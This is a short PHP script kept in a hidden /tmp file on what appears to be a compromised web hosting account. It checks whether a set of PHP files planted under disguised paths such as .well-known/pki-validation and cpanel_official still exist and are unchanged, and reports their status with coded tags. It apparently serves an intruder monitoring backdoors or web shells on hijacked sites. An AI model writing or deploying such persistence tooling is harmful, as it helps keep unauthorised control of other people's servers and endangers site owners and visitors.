File: //tmp/.resource
<?php $r = '/home/ukqcurpj/codestudio.pk'; $x = ["/.well-known/lotusscript.php"=>"bd@@367177@@1005",
"/.well-known/pki-validation/factory.php"=>"bd@@379278@@63",
"/LinkTypes.php"=>"bd@@400470@@1032",
"/.well-known/pki-validation/factory.php"=>"bd@@372386@@897",
"/cpanel_official/Data.php"=>"bd@@371114@@1009",
"/LinkTypes.php"=>"bd@@402883@@50",
"/.well-known/lotusscript.php"=>"bd@@370886@@3",
"/cpanel_official/Data.php"=>"bd@@372363@@80",
"/index.php"=>"bd@@370948@@9"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');